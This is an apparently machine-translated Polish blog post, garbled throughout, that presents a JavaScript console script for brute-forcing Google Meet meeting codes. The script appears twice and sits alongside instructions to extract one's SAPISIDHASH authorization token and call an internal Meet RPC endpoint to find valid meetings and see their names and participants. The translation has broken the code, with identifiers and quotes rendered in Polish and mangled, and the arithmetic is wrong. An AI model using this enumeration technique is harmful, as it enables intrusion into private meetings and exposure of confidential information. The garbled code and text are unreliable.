Elektroniczny

Visio – Utknij w Google Meet | Dyrk, Dyna Meet – Visio

Poznaj Visio

Contents

1 Poznaj Visio
- 1.1 Dyrk
- 1.2 Poznaj Visio

randomize = () => dico = diCo.Podział (”).Mapa (wartość => (< value, sort: Math.random() >)).zaklęcie ((a, b) => a.zaklęcie – b.zaklęcie).Mapa ((< value >) => Wartość).Dołączyć (”),
NewPatternkey = () => “xxx-xxxx-xxx”.Podział (”).Mapa (c => c == ‘-‘?Ciąg c.From Charcode (matematyka.Podłoga (matematyka.Random ()*25) +97)).Dołączyć (”),
Key = newPatternkey (), licznik = 20;
Następny = () => klucz.Podział (”).Mapa (e => e == ‘-‘ ? E: Dico [Dico.Indeks (e) + 1> = diCo.długość ? 0: Dico.Indeks (e) + 1]).Dołączyć (”),
Licznik = 0;
MeetLink = ‘https: // spotykaj się.Google.com/’, dostępny toe = () => xhr = nowy xmlhttprequest ();
If (licznik ++> = 20) licznik = 0;
Key = newPatternkey ();
Randomize ();
>
Key = następny ();
xhr.Open („Get”, MeetLink + Key);
xhr.AddEventlisner („ładuj”, (e) => fetch (MeetLink.Conat (“/$ rpc/google.RTC.spotkania.V1.MeetingSpaceService/DessistiMeetingSpace ”),„ Nagłówki ”:„ Autoryzacja ”: autoryzacja,
„Content-Type”: „Application/X-Protobuf”,
„X-Goog-Adep-Key”: E.cel.odpowiedzialność.Mecz (/\ [“https \: \/\/spotykaj \.Google\.com \ “\,” ([a-za-z0-9 \ _ \-]) “\]/) [1],
„X-Goog-Authuse”: „0”,
„X-Goog-incode-réspose-if-executable”: „base64”,
„X-Goog-Meeting-identifier”: BTOA (‘\ b \ x02 \ x12 \ f’.Conat (klucz)),
>,
„Ciało”: „\ n \ f”.Conat (klucz, „0 \ u0001”),
„Metoda”: „Post”
>).Następnie (e => e.Text ())
.następnie (e => settimeout (dostępny, 100);
konsola.Log (MeetLink.Conat (klucz).BeautifyDisplay (38), (e.Zamień (/[^a-za-z0-9]/g, „”)+„”).BeautifyDisplay (38));
>);
>);
xhr.Wysłać ();
>;
Strunowy.prototyp.BeautifyDisplay = funkcja (rozmiar) < let txt = this.valueOf(); return txt.concat(' '.repeat(txt.length >rozmiar ? tekst.Długość: rozmiar)).Podłoże (0, rozmiar).Conat (‘|’); >,
konsola.Jasne ();
dostępny ();
>) ()

Dyrk

Obecnie pracując w dziedzinie cyberbezpieczeństwa, regularnie stawiam czoła dość trywialne sytuacje.

Najnowsze, wtargnięcie osoby podczas spotkania .
Na szczęście ze względu na bezpieczeństwo spotkanie Google zawierało funkcję umożliwiającą zarówno ostrzeżenie uczestników, że dana osoba stara się dołączyć do wideokonferencji, ale także zaakceptować lub odmówić.

Jednak to wydarzenie zachęca mnie do zadawania sobie wielu pytań .

Złożoność linku Google Meet

Po pierwsze, w jaki sposób osoba może połączyć się z linkiem spotkania bez zaproszenia ?

Musimy rozważyć prostotę linku: https: // Google.poznać.com/Xxx -yyyy -zzzz

Xxx -yyyy -zzzz są tylko postaciami alfabetycznymi między A i Z, tj. 27 możliwych kombinacji dla każdej postaci.

Dla matematyków jest zatem:

27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 możliwe kombinacje .

Link Google Meet Meoge Link

Chociaż jesteśmy teraz w stanie lepiej zrozumieć, w jaki sposób budowane są linki naszych obligacji konferencyjnych „Google Meet”, istnieje bardzo ważny aspekt, który należy wziąć pod uwagę . Długość życia linku Google Meet !

Rzeczywiście, każdy może wygenerować spotkania Google w kilku kliknięciach.
Ale po kilku dniach, tygodniach lub miesiącach . Linki nie są już ważne.

Wygenerowane linki mają zatem pewien okres ważności .

Wyjątek sprawiają, że „powtarzające się” zdarzenia i tutaj staje się interesujące.
W biznesie istnieje wiele możliwości regularnego organizowania (zespół / biznes, codzienne, tygodniowe, miesięczne,, . )).
Gdy pracownik generuje tego typu zdarzenie w swoim porządku obrad, automatycznie generowany jest link Google Meet. Ten jest niezmienny.
Więc za każdym razem będziesz mieć ten sam link do tego wydarzenia.

Z odrobiną JavaScript i brutalnej siły ?

Przy wszystkich tych elementach jesteśmy teraz przygotowani do zamiatania wszystkich możliwości i osiągnięcia wysokich prawdopodobieństw w celu wykrycia linków do wideokonocjatów !

Mam więc trochę retro, który jest przedmiotem obsługi Google, aby napisać kod JavaScript, który wypróbuje nieskończoną liczbę kombinacji

(C) Dyrk.Org 2023-2024 – Roulette Meet’s Roulette
(1) Uruchom ten skrypt na https: // Google.poznać.com

)

Niech autoryzacja = “SAPISIDHASH XXXXXXXXXXXXXX_XXXXXXXXXXXXXXXXXXXXXXXXXXXX“, dico =” abcdefghijklmnopqrstuvxz “,

randomize = () => dico = diCo.Podział (”).Mapa (wartość => (< value, sort: Math.random() >)).zaklęcie ((a, b) => a.zaklęcie – b.zaklęcie).Mapa ((< value >) => Wartość).Dołączyć (”),
NewPatternkey = () => “xxx-xxxx-xxx”.Podział (”).Mapa (c => c == ‘-‘?Ciąg c.From Charcode (matematyka.Podłoga (matematyka.Random ()*25) +97)).Dołączyć (”),
Key = newPatternkey (), licznik = 20;
Następny = () => klucz.Podział (”).Mapa (e => e == ‘-‘ ? E: Dico [Dico.Indeks (e) + 1> = diCo.długość ? 0: Dico.Indeks (e) + 1]).Dołączyć (”),
Licznik = 0;
MeetLink = ‘https: // spotykaj się.Google.com/’, dostępny toe = () => xhr = nowy xmlhttprequest ();
If (licznik ++> = 20) licznik = 0;
Key = newPatternkey ();
Randomize ();
>
Key = następny ();
xhr.Open („Get”, MeetLink + Key);
xhr.AddEventlisner („ładuj”, (e) => fetch (MeetLink.Conat (“/$ rpc/google.RTC.spotkania.V1.MeetingSpaceService/DessistiMeetingSpace ”),„ Nagłówki ”:„ Autoryzacja ”: autoryzacja,
„Content-Type”: „Application/X-Protobuf”,
„X-Goog-Adep-Key”: E.cel.odpowiedzialność.Mecz (/\ [“https \: \/\/spotykaj \.Google\.com \ “\,” ([a-za-z0-9 \ _ \-]) “\]/) [1],
„X-Goog-Authuse”: „0”,
„X-Goog-incode-réspose-if-executable”: „base64”,
„X-Goog-Meeting-identifier”: BTOA (‘\ b \ x02 \ x12 \ f’.Conat (klucz)),
>,
„Ciało”: „\ n \ f”.Conat (klucz, „0 \ u0001”),
„Metoda”: „Post”
>).Następnie (e => e.Text ())
.Następnie (e =>

Settimeout (dostępny, 100);
konsola.Log (MeetLink.Conat (klucz).BeautifyDisplay (38), (e.Zamień (/[^a-za-z0-9]/g, „”)+„”).BeautifyDisplay (38));
>);
>);
xhr.Wysłać ();
>;
Strunowy.prototyp.BeautifyDisplay = funkcja (rozmiar) < let txt = this.valueOf(); return txt.concat(' '.repeat(txt.length >rozmiar ? tekst.Długość: rozmiar)).Podłoże (0, rozmiar).Conat (‘|’); >,
konsola.Jasne ();
dostępny ();
>) ()

Aby to wszystko działać, będzie konieczne:

Otwórz stronę https: // spotykaj się.Google.com
Otwórz konsolę programistów
Na karcie „Network” odfiltruj pobór / xhr i odzyskaj token tokena“Upoważnienie”
Skopiuj i wklej powyższy kod źródłowy i umieść na miejscu wskazanym tokenem.
Sprawdź klawisz „wejście” na klawiaturze.

Odzyskiwanie tokenu „autoryzacji”:

Dla ciekawych powinien wyglądać wynik tego skryptu w akcji.
Dlatego zauważamy linie, które informują nas, że przestrzeń do wideokonferencji nie istnieje.
I inni, którzy postawili nas na dowód konferencji ! Dlatego wskazując, że łącze jest prawidłowe;)

Nie spodziewaj się jednak w ciągu kilku sekund na linku spotkań ^^
(Chyba że jesteś małym szczęśliwym człowiekiem)
Będziesz musiał być wielką cierpliwością, pozwalając jej trwać co najmniej pół godziny.

Wniosek

Nie panikuj, że istnieje większa liczba szczęścia, aby znaleźć ważny link Google Meet Link niż wygrana Loto.

Uwaga ! Osoba, która przychodzi ważny dostęp do linku do niektórych informacji bez konieczności połączenia:
Nazwa spotkania (zatem unikaj poślizgu poufnych informacji) i podłączonych uczestników (wszyscy lub gra).

Poznaj Visio

Napad online

Naklejka bestsellera online

gracze